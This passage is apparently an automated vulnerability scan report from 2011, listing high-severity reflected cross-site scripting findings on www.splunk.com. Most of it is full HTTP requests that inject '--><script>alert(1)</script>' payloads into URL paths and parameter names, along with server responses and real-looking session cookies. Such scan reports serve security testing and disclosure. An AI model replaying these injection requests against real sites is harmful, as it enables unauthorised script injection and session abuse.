GET /view/customer-case-studies/SP-CAAABB29ffc9--><script>alert(1)</script>7a46f80782 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.547. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/customer-case-studies/SP-CAAABB2
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5a778--><script>alert(1)</script>b2b3382716a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/customer-case-studies/SP-CAAABB2?5a778--><script>alert(1)</script>b2b3382716a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 453a5--><script>alert(1)</script>afa9000f934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view453a5--><script>alert(1)</script>afa9000f934/developers/SP-CAAAFR3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 73184--><script>alert(1)</script>72c4099209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers73184--><script>alert(1)</script>72c4099209d/SP-CAAAFR3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload c16b9--><script>alert(1)</script>b3aad6c14e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers/SP-CAAAFR3c16b9--><script>alert(1)</script>b3aad6c14e7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.551. http://www.splunk.com/view/developers/SP-CAAAFR3 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/developers/SP-CAAAFR3
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2871d--><script>alert(1)</script>538c614736d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/developers/SP-CAAAFR3?2871d--><script>alert(1)</script>538c614736d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e2192--><script>alert(1)</script>66013bbc7fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe2192--><script>alert(1)</script>66013bbc7fd/education/SP-CAAAAH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload d7aa4--><script>alert(1)</script>161bc2c26b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/educationd7aa4--><script>alert(1)</script>161bc2c26b9/SP-CAAAAH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload e95e0--><script>alert(1)</script>69c3b0bc53e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/education/SP-CAAAAH9e95e0--><script>alert(1)</script>69c3b0bc53e HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.555. http://www.splunk.com/view/education/SP-CAAAAH9 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/education/SP-CAAAAH9
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3c6ea--><script>alert(1)</script>1fb748c8ba6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/education/SP-CAAAAH9?3c6ea--><script>alert(1)</script>1fb748c8ba6=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:18:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 123a7--><script>alert(1)</script>10f09601a12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view123a7--><script>alert(1)</script>10f09601a12/free-vs-enterprise/SP-CAAAE8W HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:50 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:50 GMT; path=/ ETag: 90b014140829bf9e63f05a92223e9a5e1296944090 Last-Modified: Sat, 05 Feb 2011 22:14:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3ca33--><script>alert(1)</script>316fe5dd1dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/free-vs-enterprise3ca33--><script>alert(1)</script>316fe5dd1dc/SP-CAAAE8W HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:25 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ ETag: b492f0c68842a737dbff2351eb9df2421296944125 Last-Modified: Sat, 05 Feb 2011 22:15:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a5820--><script>alert(1)</script>487a5540161 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/free-vs-enterprise/SP-CAAAE8Wa5820--><script>alert(1)</script>487a5540161 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; 